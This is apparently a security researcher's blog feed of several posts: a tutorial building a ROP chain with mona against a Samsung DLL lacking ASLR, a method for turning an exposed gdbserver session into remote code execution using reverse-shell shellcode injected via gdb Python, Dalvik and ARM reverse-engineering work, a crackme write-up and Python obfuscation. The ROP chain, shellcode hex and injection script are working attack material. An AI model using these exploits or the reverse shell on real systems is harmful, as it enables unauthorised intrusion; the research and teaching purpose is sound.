Mona 101: a Global Samsung DLL

Mona 101: a Global Samsung DLL

This blogpost will be just another 101 for There’s already a
good introduction to / full documentation of mona here, including
setting it up and running it for the first time. (Which is surprisingly easy,
at least with Immunity Debugger – I haven’t tested mona with WinDBG.)

Our target

Well, it turns out that a dll called WinCRT.dll, developed by Samsung and
distributed by default on at least a set of Samsung laptops, is
being loaded in every process that imports user32.dll on my system.. Yay!
Needless to say it doesn’t have ASLR enabled, nor does it rebase by default.
If you haven’t guessed its base address by now, then I’ll give you a hint;
0×10000000. A copy of the DLL can be found here – naturally I’m not
responsible for whatever you do with it :p

Btw, the path of this Samsung DLL is:
C:\Program Files (x86)\Samsung\Movie Color Enhancer\WinCRT.dll

Generate some ROP

After running any program which imports user32, such as the following
MessageBox() program, we attach Immunity Debugger to it.

#include <windows.h>

int main()
    MessageBoxA(NULL, "Hello Samsung!", ":-)", 0);

We run the following command and get our ROP chain after roughly 10 seconds:

!mona rop -m wincrt -rva

As documented in the tutorials that were linked earlier in this blogpost, the
-m switch specifies the module to search, and -rva gives a dump with
relative addresses to the base address. (In case you need an infoleak to
obtain the base address of your target module, rather than having a DLL that’s
being loaded on a static address.)

The ROP chain returned may look like the following, including some comments
about what the registers should look like at the point that VirtualAlloc is

Register setup for VirtualAlloc() :
 EAX = NOP (0x90909090)
 ECX = flProtect (0x40)
 EDX = flAllocationType (0x1000)
 EBX = dwSize
 ESP = lpAddress (automatic)
 EBP = ReturnTo (ptr to jmp esp)
 ESI = ptr to VirtualAlloc()

def create_rop_chain(base_wincrt):
    # rop chain generated with
    rop_gadgets = [
        base_wincrt + 0x0000f128,  # POP EAX # POP EBP # RETN [WinCRT.dll]
        base_wincrt + 0x0001f0a8,  # ptr to &VirtualAlloc() [IAT WinCRT.dll]
        0x41414141,                # Filler (compensate)
        base_wincrt + 0x00005bff,  # MOV EAX,DWORD PTR DS:[EAX] # ADD CL,CL # RETN 0x08 [WinCRT.dll]
        base_wincrt + 0x0000431d,  # PUSH EAX # ADD AL,5F # POP ESI # RETN [WinCRT.dll]
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        base_wincrt + 0x0001a14e,  # POP EBP # RETN [WinCRT.dll]
        0x00000000,                # &  []
        base_wincrt + 0x0000bd5b,  # POP EBX # RETN [WinCRT.dll]
        0x00000001,                # 0x00000001-> ebx
        base_wincrt + 0x00005209,  # POP EBX # RETN [WinCRT.dll]
        0x00001000,                # 0x00001000-> edx
        base_wincrt + 0x0001183c,  # XOR EDX,EDX # RETN [WinCRT.dll]
        base_wincrt + 0x0001175e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [WinCRT.dll]
        0x41414141,                # Filler (compensate)
        base_wincrt + 0x000191b8,  # POP ECX # RETN [WinCRT.dll]
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        0x00000040,                # 0x00000040-> ecx
        base_wincrt + 0x0000f203,  # POP EDI # RETN [WinCRT.dll]
        base_wincrt + 0x0000f204,  # RETN (ROP NOP) [WinCRT.dll]
        base_wincrt + 0x0000f128,  # POP EAX # POP EBP # RETN [WinCRT.dll]
        0x90909090,                # nop
        0x41414141,                # Filler (compensate)
        base_wincrt + 0x0000c27e,  # PUSHAD # ADD AL,0 # RETN [WinCRT.dll]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

# [WinCRT.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: False, v0.0.0.1 (C:\Program Files (x86)\Samsung\Movie Color Enhancer\WinCRT.dll)
base_wincrt = 0x10000000
rop_chain = create_rop_chain(base_wincrt)

Fixing the ROP chain

Unfortunately mona makes some small mistakes, but that’s why it gives great
feedback in the form of rop.txt and rop_suggestions.txt.

Now if you look closely at the generated ROP chain, while comparing them to
the notes about the required states of the registers for VirtualAlloc, then
you’ll notice that some gadgets have to be shuffled around, and some are not
correct yet.

Let’s analyze each register top-to-bottom from the provided register list in
order to see if they’re all set correctly. First we start with eax.

Eax is set to 0×90909090 at the end. However, it also sets ebp to an invalid
value – register dependencies is something that mona doesn’t handle very
well yet, unfortunately. Anyway, it’s easier to replace this gadget than to
shuffle it around. I ended up replacing it by a “pop ecx ; retn” and
“mov eax, ecx ; retn” gadget, and moving it to an earlier place in the ROP
chain where ecx has
not yet been assigned its final value. Ecx itself is already correct, it’ll be
set to 0×40 using the ‘original’ “pop ecx ; retn” gadget.

Edx has to become 0×1000, for which mona has decided to use ebx as
intermediate register. We can remove the first gadget that sets ebx, as its
value is overwritten right away when executing the next gadget. (Which sets
ebx as well.)

Now mona handles esp for us, so we don’t have to do anything there. The next
register, ebp, however, does need some extra work. The description tells us
it needs to point to a “jmp esp” gadget, but because there’s no such gadget in
our DLL mona sort of failed silently. (The comment doesn’t show an error
message, but instead shows something that doesn’t make much sense.)

Given there’s no “jmp esp” in our code, nor a direct “push esp ; retn” gadget,
we have to play around with mona some more.. We run the following command
which is, again, documented here, and find the following gadget.

!mona findwild -s "push esp#*#retn" -m wincrt

0x10009558: push esp # add al,2 # adc bl,al # xor eax,eax # retn [WinCRT.dll]

Finishing up

So yeah, that’ll do for us :) Patch the 0×00000000 value with
“base_wincrt + 0×00009558″ and ebp is good to go. Finally, esi and edi
have been handled correctly by mona. (Note that we don’t have to worry about
the value of eax in our custom “jmp esp” gadget, as this is executed right
after the call to VirtualAlloc, and literally jumps to our shellcode.)

Having fixed the ROP chain, our final ROP chain including some MessageBox()
shellcode, wrapped into a C file looks like the following. (Woah,
somebody added C dumping support to mona yesterday!) In case you’re interested
in the binary, to be ran when the DLL is loaded into memory, it can be found


This was the first time I tried mona and I’m genuinely happy about it. Very
easy to use and it did the job for me :) Ah yeah, so anyone with this
particular Samsung software on his computer.. how do I even.. I guess it’s
just “another one of those”.

Turning arbitrary GDBserver sessions into RCE

Turning an arbitrary GDBserver sessions into RCE

Today we’ll see how we can turn an arbitrary GDBserver remote debugging
session into remote code execution. First of all, let’s assume gdbserver is
ran using the following command. We will also assume that the target
architecture is Linux/x86, but you can port the technique to other
architectures as needed.

$ gdbserver --remote-debug ./some_unknown_binary

What happens is that gdbserver will serve as many remote debugging sessions as
possible while it’s running. That is, we can have as many remote debugging
sessions as we like, until the gdbserver is killed (but only one at a time.)
This makes sense, because if we are debugging a target, then we don’t want to
restart gdbserver every time we hit “run” in gdb.

Let’s assume one were to run gdbserver in a screen, to prevent accidental
connection resets resulting in losing the gdbserver session (assuming we’re
ssh’ing into a remote server.) Exactly this happened to me – I recently found
out that there were still two (of my) gdbserver’s running in a screen from
when we were playing a CTF, almost two months ago.

Now anyone with the ip address and port number can attach to your gdbserver by
doing the following.

$ gdb
(gdb) target extended-remote host:port
Remote debugging using host:port
(gdb) run
[Inferior 1 (process 42) exited normally]

In order not to make the RCE not too easy, we’re going to assume that we don’t
have any symbols of the remote binaries, and that all addresses are ASLR’d. In
other words, educational guessing of “main” is useless, and we won’t be able
to do arbitrary function calls during debugging such as the following.

(gdb) call system("/bin/sh")
No symbol table is loaded.  Use the "file" command.

However, if we enter a breakpoint at an invalid address and run the debuggee,
we get an error right before executing the very first instruction of the
process. This looks roughly like the following :)

(gdb) break *0
Breakpoint 1 at 0x0
(gdb) run
Starting program:
warning: Could not load vsyscall page because no executable was specified
try using the "file" command first.
Cannot insert breakpoint 1.
Error accessing memory address 0x0: Unknown error 18446744073709551615.
(gdb) info reg eip
eip            0xf7fe0850       0xf7fe0850

At this point the debuggee has been executed, and we’re able to inspect and
modify its state. We continue by removing our earlier breakpoint. Now it’s
time for the fun part.

Reverse Shell Shellcode

After a bit of googling, I stumbled upon the following shellcode. This
shellcode connects to an ip address and port of your choosing, and executes
/bin/sh with stdin, stdout, and stderr set to your socket. If we have netcat
listening on the remote ip address and port, then it’ll get a connection
request upon execution of the shellcode, and we can use it to run arbitrary
shell commands on the shellcodes machine, as if we had shell access. After an
initial test, this shellcode seemed to work on my x86_64 machine running a
32-bit application. However, there’s a small problem with this shellcode. If
we look closely at the shellcode, we notice the following.

804807b:   31 db        xor    ebx,ebx
804807d:   b3 02        mov    bl,0x2
804808a:   fe c3        inc    bl
8048098:   b1 03        mov    cl,0x3
804809a <dupfd>:
804809a:   fe c9        dec    cl
804809c:   b0 3f        mov    al,0x3f
804809e:   cd 80        int    0x80      ; system call
80480a0:   75 f8        jne    804809a

Investigating this system call further, we see that this is the dup2
system call
. However, the ebx register, or old_fd, seems to be
constant here – namely three. (I figured this out while brushing my teeth..)
This is the default fd if you open your first file descriptor in a program,
which is something we cannot assume, and is definitely not the case when
running the debuggee under gdbserver. (E.g., this shellcode fails if you open
a file or socket before running it, because the fd of the socket allocated by
our shellcode will be four for example, instead of three.)

If we look further, we see that the esi register contains the fd number
returned from the socket system call. (Actually, this is the socketcall
system call with SOCKOP_socket as operation, but that’s a minor detail
specific to Linux/x86.)

8048075:   cd 80        int    0x80      ; socket()
8048077:   89 c6        mov    esi,eax   ; esi = fd
804808e:   6a 10        push   0x10      ; sizeof(sockaddr_in)
8048090:   51           push   ecx       ; sockaddr_in *
8048091:   56           push   esi       ; fd
8048092:   89 e1        mov    ecx,esp
8048094:   cd 80        int    0x80      ; connect()

Long story short, we want to preserve esi before the connect system call,
and store it into ebx after the system call. Thus ebx will contain the fd of
our socket, and the system calls to dup2 will duplicate the correct fd into
stdin, stdout, and stderr. The following snippet shows the updates shellcode.
This is the shellcode that we’re going to use.

8048092:   89 e1        mov    ecx,esp
+                       push   esi       ; push fd
8048094:   cd 80        int    0x80      ; connect()
+                       pop    ebx       ; pop fd into ebx
8048096:   31 c9        xor    ecx,ecx
8048098:   b1 03        mov    cl,0x3

Running the Shellcode

All we have left to do is to patch the correct ip address and port into the
shellcode, namely that of our listening netcat instance (e.g., running
“nc -vvv -l 9001″ on your favourite linux box), overwriting eip with the
shellcode, and finally, running it.

For my exploit I’m using gdb’s Python bindings, as initially I had another
technique in mind, which required a bit more scripting. Following is the
final part of the code which generates the shellcode, overwrites it onto eip,
and executes it. We have two continue statements at the end, as the
shellcode will execv into /bin/sh, after which we’ll get an error that
gdbserver can’t read the memory of eip anymore, so we have to instruct
gdbserver to continue past that error.

def reverse_shell((ip, port)):
    """Modified x86 reverse shell"""
    ip, port = socket.inet_aton(ip), struct.pack('>H', port)
    sc = \
        '31c031db31c931d2b066b301516a066a016a0289e1cd8089c6b06631dbb30268' \
        '000000006668ffff6653fec389e16a10515689e156cd805b31c9b103fec9b03f' \
    return sc.decode('hex').replace('\xff'*2, port).replace('\x00'*4, ip)

for idx, ch in enumerate(reverse_shell(netcat)):
    gdb.execute('set *(unsigned char *)($eip + %d) = %d' % (idx, ord(ch)))


Final Exploit

The final exploit code can be found here.

Execution of the code may look like the following. We’ll need three shells.
(Optionally on different servers – do as you like.)

Shell 1

$ gdbserver --remote-debug ./some_unknown_binary

Shell 2

$ nc -vvv -l 31338

Shell 3

$ vim   # Patch the ip addresses
$ gdb -x

Enjoy Shell!

Now if we go back to Shell #2, we’ll see the following, and can run arbitrary
shell commands.

skier@box:~$ nc -vvv -l 31338
Connection from port 31338 [tcp/*] accepted
uid=1010(skier) gid=1011(skier) groups=1011(skier)


This is a funny technique which basically tells you not to have gdbserver’s
running around :)

Dalvik Research

Dalvik Research

Over the past couple of months I’ve been doing some research with regards to
the Dalvik Virtual Machine, which is Android’s Java Virtual Machine
implementation. Long story short, most Android applications are written in
Java, which gets compiled to Dalvik Bytecode, and ends up in an APK file (a
Zip file.)

As part of my research on Dalvik, I analyzed both the Dalvik VM itself and
various applications – with a focus on their Obfuscation techniques (which
makes analysis harder.) This research was presented on a couple of

Back in June I already posted my slides for my AthCon
talk, which focussed on Deobfuscation. Then a couple of weeks ago,
I did a similar talk together with Rodrigo Chiossi at
H2HC, featuring new and updated content, with a bit more focus on some
of the techniques involved in creating new Dex files.

Finally I did a talk yesterday at, focussing on the
Dalvik Virtual Machine itself. In this talk I presented about an
“undocumented feature” which I found in the way Android verifies Dex files,
allowing an attacker to run arbitrary Dalvik Bytecode (which is normally not
allowed – all code must normally be hardcoded and will be verified upon
installation.) Following are the slides and the
Proof of Concept DvmEscape application.

As explained during the presentation, when running this application on your
phone or emulator, you can type arbitrary Dalvik Bytecode and execute it by
clicking on the “Run Dalvik” button. On the 30th slide of the presentation one
can find two examples of valid Dalvik Bytecode, which, when ran, will return
with a fancy number. Unfortunately the disassembler mentioned in the
slides is currently not open source, but for some more documentation on the
Dalvik Bytecode there’s always the Dalvik Bytecode reference.

Win32 Calc.exe Proof of Concept

If you want to run my win32 calc.exe Proof of Concept from the presentation
you’ll have to do a couple of things:

  • Install CalcExe.apk on the device
  • Get the script, which “types” a string into
    the emulator
  • Finally, type payload.txt to the DvmEscape application, with
    the following command.

$ python $(cat payload.txt)

Note that typing the bytecode in to the emulator (or phone?!) takes roughly a
minute. (No, there appears to be no support for using the clipboard with the
emulator.) After that, just click on the button and calc should pop :)

For more information or questions, feel free to reach me at my new email
address; mail.

Dirkjan Email Feed

Dirkjan Strip Mailing List

This blogpost is mainly for Dutch (speaking) people (although I’ll
still keep the blogpost in English.) As I’m sure you’re all well-aware,
Dirkjan is an awesome Dutch comic.

A couple of weeks ago I stumbled upon the weekly feed from Veronica.
Naturally, not wanting to check the website every week, I came up with a very
simple Dirkjan Feed in the shape of a Mailing List. Of course this is not
so much a mailing list, as it’s mostly one-way traffic, but it’s a fun way to
keep up-to-date with two Dirkjans a week!


Having said that, one can subscribe here simply by filling out
the email address. Other information is optional and not very interesting.
(Yes, the website is a bit ugly – it’s the default mailing list manager.)

By subscribing you agree to being awesome (given you’re interested in reading
Dirkjan) and the legal disclaimer on the bottom of this blogpost.


As I’ve only just set up the mailing list, I do not know exactly when new
comics will arrive, but it looks like it will be every Tuesday. Please, when
, do not panic – the comics will come eventually! (Just

Legal stuff

I’m not affiliated with Veronica in any way. Any damage done through this
Dirkjan Email Feed is at your own responsibility. I do not intend
to damage Veronica in any way.

That’s all, and have fun reading Dirkjan. Dirkjan is awesome :)

Darm Update – More ARMv7, More Thumb

Darm Updates – More ARMv7, More Thumb

Darm is an ARMv7 disassembler in C. This blogpost is just
a small update about the new stuff in darm from over the past couple of
months, as there were some delays due to conferences and other stuff :)

Thumb support

Most notably, recently Darm has gained support for the Thumb instruction
set. Those of you familiar with ARMv7 know ARMv7 has two modes, namely, ARMv7
and Thumb. ARMv7 contains pretty much all the instructions you’d ever need,
but Thumb is a small subset of the most used ARMv7 instructions and are only
16 bits in size, whereas ARMv7 instructions are 32 bits in size. Needless to
say, Thumb allows for more compact code.

The API to disassemble Thumb instructions is as straightforward as the
equivalent function for disassembling ARMv7 instructions. Furthermore, the two
instruction set modes share the same data structure, darm_t, hence it is
easily possible to write generic analysis routines without having to worry
whether you’re analyzing ARMv7 or Thumb.

Currently, the C API looks roughly like the following. (Including the Thumb2
function, for more information on that, read further.)

typedef struct _darm_t {
} darm_t;

// disassemble an armv7 instruction
int darm_armv7_disasm(darm_t *d, uint32_t w);

// disassemble a thumb instruction
int darm_thumb_disasm(darm_t *d, uint16_t w);

// disassemble a thumb2 instruction
int darm_thumb2_disasm(darm_t *d, uint16_t w, uint16_t w2);

ARMv7 Improvements and Bug Fixes

ARMv7 has mostly had some bug fixes and a couple of new instructions. Nothing
too spectacular, but it’s still improving as I find bugs and stumble upon new

Coming up: Thumb2 support

Currently I’m working on getting support for the Thumb2 instruction set as
well. As the Thumb instruction set is fairly limited with regards to the
instruction that it can handle, as it’s only 16 bits in size, rather than 32
bits, there’s also the Thumb2 extension. Thumb2 features almost all (except
for maybe a handful of instructions) of the instructions which are also
available in the ARMv7 instruction set, hence allowing the optimized Thumb
instructions to be mixed with Thumb2 instructions, which are, as ARMv7, 32
bits in size.

Having said that, if there are requests for instructions which you’d like to
see sooner rather than later, please do contact me. At first I aim to support,
let’s say, 90% of the binaries while keeping the amount of implemented
instructions to a “minimum.” That is, I’ll focus on the most used Thumb2
instructions at first, and go for the complete instruction set later.

Difference between ARMv7 and Thumb/Thumb2

A small explanation on ARMv7 vs Thumb/Thumb2.

When executing ARM instructions, the instruction will be executed as ARMv7
instruction whenever the address is 4-byte aligned, and executed as either
Thumb or Thumb2 instruction, depending on its encoding, when the lowest
significant bit is set. That is, when the address is not 4-byte aligned, but
instead either addr+1 or addr+3 (with addr being a 4-byte aligned pointer),
then the instruction is decoded as being either Thumb or Thumb2.

The instruction is either decoded as Thumb or Thumb2 depending on a couple of
the most significant bits. When decoded as Thumb, one 16 bit word is fetched
and executed. When decoded as Thumb2, a second 16 bit word is fetched and the
instruction is decoded as if it were a 32 bit word.

At the following lines of code we can see the comparison of the
upper 5 bits of the first 16 bit word. When the upper five bits equal either
b11101 (binary 11101, or 29 in decimal), b11110, or b11111, then it is a
Thumb2 instruction. Otherwise it’s a Thumb instruction.

Also note that at the moment there are two seperate functions to disassemble
Thumb and Thumb2 instructions, but don’t worry, in the future there’ll be a
nice wrapper around them :)


For questions etc, you know where to find me.

Solving ZCrackme#2: A Custom Emulator Approach

Solving ZCrackme#2: A Custom Emulator Approach

Due to my non-existent experience with using gdb under ARMv7, I decided to
solve this challenge (the ZCrackme #2 Challenge) using a minimal
ARMv7 emulator
based on my ARMv7 disassembler. (The original
challenge can be found here.)

ZCrackme#2 Challenge

The binary itself is fairly interesting. It has a similar structure as the
first ZCrackme challenge (not sure if there’s a blogpost about this one
though.) Basically the ELF header is messed up, sections are missing, and the
Entry Point points to a page filled with zeroes.


Upon further inspection, using readelf -a zcrackme2, we find that the binary
features the so-called preinit-array, init-array, and fini-array dynamic
sections. These dynamic sections in fact represent a table of function
addresses which are being called right before calling the real Entry
Point (in the case of preinit-array and init-array) and called after
calling the real Entry Point (in the case of fini-array.)

Looking up the various virtual offsets using IDA Pro, we find that only the
init-array points to a real address, loc_B0D8. (The other table arrays,
preinit-array and fini-array, are filled with zeroes and -1′s, which are
nops – as in, these are not really called.)

We conclude that the actual entry point, or, the code that will be executed
first, is located at this (loc_B0D8) address. From analyzing this routine
in IDA Pro, we see
some sort of decryption loop which overwrites some memory. Finally, after
executing said decryption loop, an interesting system call is performed,
namely #0xf0002. We find that this system call represents


Basically, before the decrypted code can be executed, the code cache first has
to be cleared for the particular address range in order to make sure that,
when it is being executed, the new code will be executed, rather than any
remaining code in the cache.

Similar tricks to this (decrypting code and clearing the cache) are performed
a total of five times in this crackme.

So, having cleared the cache, the execution flow of the crackme now ends up in
the decrypted code. Which, in turn, does some more rounds of decryption.

Code Decryption

As mentioned, the crackme overwrites memory of the ELF file a total of five
times. One of these “decryptions” in fact zeroes the first 100 bytes of the
ELF header. As our goal is to dump a decrypted version of the crackme binary,
this ELF header corruption does not help us (as IDA Pro wouldn’t understand
the binary anymore.)

Reconstructing a Decrypted Binary

As decryption is being followed by clearing the cache each time, we dump a new
binary during each time the cache is cleared. We do this by applying the
changes to a copy of the original binary. That is, read the decrypted data
from emulator memory, and overwriting it to our original binaries buffer. We
do this for each decryption, except for the one iteration where the ELF header
is zeroed out. (Note: the __clear_cache system call takes the starting
address as first parameter and the end address as second parameter, hence it
is trivial for us to find out which chunks of memory have been decrypted.)

Scripting the Emulator

The following script, although a bit messy, represents the code to dump
the binary a couple of times, which results in the final binary we’re
interested in. The unpacked binary can be found here. (Note that this
unpacked binary may be inaccurate, with regards to global variables etc that
have been updated during runtime but are not reflected in this version of the

Having successfully dumped the unpacked binary, it is now time for some static
analysis on this binary. Do note that our emulator should run fine on
Windows and Linux (with a 32bit Python installed, that is.)

The actual Crackme

Looking through the dumped binary, we find ourselves looking at sub_87B4,
which is the function where the real stuff is happening (argc/argv parsing,
that is.)

There are a couple of odd text messages which will be printed whenever
incorrect information is entered on the commandline. Finally, we find some
interesting function calls, of which one to sub_8638, which seems to decrypt
the string buffer that can be found at byte_9C35, and another function which
does a custom strcmp() against the argument on the commandline.

The string at byte_9C35 is decrypted by xor’ing with 0x0d (decrypted to a
buffer on the stack by sub_8638), resulting in the
string ZenCracking. That said, we’ve solved the challenge..


In case somebody has a working gdb for ARMv7 setup, this challenge is probably
pretty easy (i.e., step through the various decryption iterations, and try to
find the custom strcmp.) However, I had fun implementing the simple ARMv7
emulator, which is in fact pretty tricky, with all the conditional stuff going

Now a harder crackme? Let’s hope the next one does not involve xor
“encryption” :p Zimperium’s response was, however, that having gotten to the
xor-decryption part already shows enough knowledge and understanding of ARMv7,
to which I agree :)

Automated Deobfuscation of Android Applications

Automated Deobfuscation of Android Applications

During AthCon 2013 last week I talked about Automated Deobfuscation
of Android Applications and Malware
. In particular, this presentation
focussed on using automated deobfuscation tools in order to speed up the
analysis of 3rd party applications which have been obfuscated.
Click here for the slides.
The cyanide and obad.a samples discussed in the presentation can be found
here (password infected.)

The Dexguard Scripts

At the moment the dexguard scripts are focussed at deobfuscating all
obfuscated strings and reconstructing a new dex file. As you will quickly see
when analyzing the _undexguard.dex files (explained further in the samples
section), this is far from complete deobfuscation. However, it gives a good
start at analyzing the sample more quickly. (And it’s work in progress.)

The tools?

As for now I have decided to, unfortunately, keep the code private. I’m
considering setting up a deobfuscation website later, where one can upload
a sample and download the deobfuscated sample a few seconds later.

Please do let me know if you (or your company) is interested in such
You know where to contact me.

The Samples

A little explanation on the given samples.

Cyanide Sample

Cyanide.dex is a root exploit by Justin Case.

  • cyanide_original.dex is the original Cyanide binary
  • cyanide_dexguard.dex is a Dexguarded version of cyanide_original.dex
  • Running on cyanide_dexguard.dex gives us cyanide_unchina.dex
  • Running our dexguard scripts on cyanide_unchina.dex gives us cyanide_undexguard.dex

Note: the dexguard version used for this sample is the one-to-last, however,
our framework has support for the latest version as well.

Obad.a Sample

Obad.a is a Most Sophisticated Android Trojan.

  • obad_original.dex is the original obad.a binary
  • We get obad_undexguard.dex after running our dexguard scripts on obad_original.dex

Note: obad_undexguard.dex will not run on an emulator or a real device due
to the way it’s built. (The cyanide_undexguard.dex, however, should work.)
Even though it doesn’t run, JEB loads the undexguarded file just fine,
so it’s mostly useful for analysis.

Pintool and Z3 Introduction

I’ve posted an introduction on Pintool and one on Z3 on the blog of our CTF Team, De Eindbazen.

And, yes, these actually provided us with results!

Pintool Introduction:

Z3 Introduction:


Python Source Obfuscation using ASTs

Python Source Obfuscation using ASTs


For one of the challenges of the Hack in the Box Capture the Flag
game last week, I decided to release an obfuscated and compiled Python class.
After doing some research on the internet about this particular topic, it
appeared there is no real up-to-date tool for this. I mostly found paid
software and/or software that has been outdated for several years, or at least
looks like it is.

Well, that’s great. This allows me to make something new-ish.

The Actual Challenge

The actual challenge was actually rather easy; given a teamname
and a flag on the commandline, the Python script would verify whether the flag
is correct or not. By correctly using a few prints here and there, the
challenge can be solved within minutes. Which is why we obfuscate it! As we
obviously want the teams playing our CTF to get some headaches :)

Abstract Syntax Trees

According to Wikipedia, an Abstract Syntax Tree is a tree representation of
the abstract syntactic structure of source code written in a programming
language. In other words, an AST represents the original source code as a

Fortunately for us, Python provides a built-in ast module which is able to
parse Python source into an AST (actually using the built-in compile()
method.) Besides that, the ast module gives us access to all available ast
nodes (e.g., Call, BinOp, etc.)

With this knowledge, we’re able to rewrite the original AST using the
ast.NodeTransformer class. For a brief example of what this
looks like, please refer to the official documentation.

Finally, after rewriting the AST, we can do two things. We can generate a
compiled python object directly from the AST. Unfortunately I did not find a
way to do this (or a library, for that matter), if you know of one, feel free
to point me to it :) The other option is to generate Python code from the AST
again and to compile it from there. For this step, one would use the module. (Note that I submitted a pull request,
as the current version gave me an error with regards to the omission of
parentheses for binary operations

We’re now at the point where we can parse Python code into an AST, rewrite it,
and write a new Python source from the rewritten AST. The final step for my
challenge was to compile the created Python source into an object, which can
be done by executing the following command on the commandline. (I’m sure it’s
also possible using a Python function, but this works just fine for the

$ python -mcompileall .


Before diving into the obfuscations I performed on the AST, I’d like to note
that the compiled Python object can be decompiled using Mysterie’s
python decompiler, uncompyle2.

Obfuscation through ASTs

So basically I only did a few simple obfuscations, which already proved to be
painful enough, but it’s a nice start for anyone that’s looking into doing
something similar.

The ast.NodeVisitor class, which was mentioned earlier in this blogpost,
allows one to visit each AST node in the tree, with the possibility to
modify them or to delete them. We can do this by implementing visit_
functions. For example, in order to analyzer/modify/delete certain Name
nodes, which are used for variable lookups etc, we implement a visit_Name
function in our obfuscation class (which, btw, extends ast.NodeVisitor.)

Modifying AST nodes using the NodeTransformer

The NodeTransformer can modify an existing AST in a fairly simple way. By
returning the original node, the AST remains untouched, as is showed in the
following example code.

from ast import NodeTransformer

class Example01(NodeTransformer):
    def visit_Str(self, node):
        return node

One can modify an AST node by return a new node. For example, to replace all
strings with an empty string, see the following snippet.

from ast import NodeTransformer

class Example02(NodeTransformer):
    def visit_Str(self, node):
        return Str(s='')

And, finally, to delete a node, simply return None in the visit_ function,
although this can give weird situations in which the new AST is not valid

Example Obfuscation – Strings

In the AST, constant String nodes are represented with Str nodes. These
Str nodes have one interesting field, namely the s field, which contains
the actual string. For example, in the AST of the following Python source,
there will be exactly one Str node with the s field set to “Hello AST”.

print 'Hello AST'

For the challenge, I implemented a handful simple string obfuscations. Take
for example the following code (rewritten a bit, but similar to the code in
the obfuscator.)

from ast import NodeTransformer, BinOp, Str, Add

class StringObfuscator(NodeTransformer):
    def visit_Str(self, node):
        return BinOp(left=Str(s=node.s[:len(node.s)/2]),

Noteworthy in this example code is that BinOp is a node representing a
binary operation, in this case addition (because of the Add node.) A binary
operation takes a left operand and a right one. On the left we put the first
half of the actual string, and on the right we put the second half of the
string. When running this “obfuscator” on our example once, we get the
following code. (Note that you can run such obfuscator multiple times to
achieve extra painful code. This is what I did for the challenge :p)

print ('Hell' + 'o AST')

Other string obfuscations included reversing a string, i.e., “abc” ->
“cba”[::-1], and converting single-length strings (which you’ll get soon
enough when recursively running the obfuscator a few times) into a chr()
statement (i.e., “a” -> chr(0×61).)

The Obfuscated Challenge

After running the original challenge a few times through
the obfuscator, which, in addition to obfuscating strings, also
obfuscates integers, import statements, and global variable names, we get
our actual challenge.

And, yes, running the obfuscator several times does indeed look like the

$ python|python -|...


Having pasted the original challenge in the blogpost, there’s not much left of
the challenge itself. However, I found the methods behind the obfuscation
fairly interesting, and perhaps so does somebody else.. :)

Cross-referencing stand-alone Dalvik Bytecode

Cross-Referencing stand-alone Dalvik Bytecode

A few days ago Patrick Schulz from BlueBox Security
posted an Android Challenge on BlueBox’ blog. In this blogpost we will
not go into the entire challenge, but rather focus on the patched bytecode.

Shameless self-promotion: tweet, reddit (I didn’t even have to make
the reddit post, hah.)


After reading the blogpost, including the spoiler, it’s evident that the
native library will patch the bytecode of a particular function that was
originally implemented in classes.dex (the container which keeps all
dalvik bytecode with metadata.)

As part of research I’m doing for my presentation at AthCon I found
the patching process interesting in particular. This is actually a technique
I’ve thought about earlier, but then again, I’m sure many people have :)

Just-in-Time Bytecode

In order to speed up the process of executing the Dalvik bytecode, Android has
a Just in Time compiler, which may compile certain functions into native ARMv7
instructions. This allows the virtual machine to execute faster compared to
interpreting the bytecode naively.

I do not know the following for sure, as it depends on the internals of the
dalvik JIT, but it may require the bytecode to be patched before executing
it. If we were to patch the bytecode after it has been compiled by the JIT,
then who’s going to execute it? (This is just a side-note for anyone looking
to do the same in the future.)

Locating the Bytecode

Opening up the native library that can be found inside the apk, we find
ourselves with various functions dealing with the Dex file format.
After looking through the functions for a minute or two, we get to a
mprotect() call followed by a memcpy() call, this is where the function is
being patched, as described in the spoiler by the Patrick’s blogpost.

Extracting the Bytecode

I loaded the native library in IDA Pro. It appears that the symbols were not
stripped, so that makes it easier for us as well. Anyway, when the relevant
memcpy function is found, we see an obvious inject_ptr. Which is a pointer
to the target bytecode. We extract the few hundred bytes of bytecode directly
from the binary, as it’s not encrypted or anything, and put the hexdump in a
file. (Use the Hex View in IDA Pro.)

We then translate the hex dump into a binary file using the following command.

$ xxd -r -p hexfile binfile

Analyzing the Bytecode

Now we’ve got raw bytecode. It appears that dexdump doesn’t really know what
to do with it. We can do two things now. The first option would be to create
a new .dex file with the patched function (i.e., patching the original
.dex file with the new bytecode), but I don’t feel like doing that.
The second option would be to disassemble the raw bytecode and to fix all
cross-references to other methods, strings, etc. So that’s what I did.

For simplicity sake I wrote some Python bindings for my dalvik disassembler,
which I made a few months ago and is unfortunately still not public.
Disassembling the raw bytecode then results in the following output.

$ python binfile
0 const/4 v2, #+0
2 invoke-virtual {v12}, meth@3103
8 move-result v4
10 new-instance v5, type@475
14 invoke-direct {v5}, meth@3149

However, as you may notice, we’re missing some information here. So I also
wrote some Python bindings around my Dex file parser, which is still private,
just like the dalvik disassembler. The references in the bytecode, i.e.,
meth@3103 etc., are references to the original .dex file, so I dumped all
the relevant tables from the original .dex file into a simple database file
(actually just a pickle‘d dictionary, to make life easy.)

Having a database with all lookup tables we can now continue onto the
disassembling part. When disassembling a dalvik instruction, the disassembler
also returns whether there’s a lookup and in which table this lookup is.
Printing the correct information next to the instruction is therefore as easy
as reading from the correct table with the correct index. This looks like the
following in the disassembler code.

length, d = disasm(...)
if d.kind is None:
    print offset, d.string
    print offset, d.string, ';', c[d.kind][d.index]

Disassembling again, with the database file as parameter, we get the following

$ python -c bindb binfile
0 const/4 v2, #+0
2 invoke-virtual {v12}, meth@3103 ; ()I Ljava/lang/String; length
8 move-result v4
10 new-instance v5, type@475 ; Ljava/util/HashMap;
14 invoke-direct {v5}, meth@3149 ; ()V Ljava/util/HashMap; <init>

Now I thought that was pretty cool, so.. :)

Challenge Spoiler

For those of you that would like to do the challenge without having to write
several hundreds if not thousands of lines of code and/or without directly
patching the binary, the complete output of the bytecode can be found

Small note: it appears my disassembler doesn’t really understand signed
shorts at the moment, but that’ll be fixed another time.


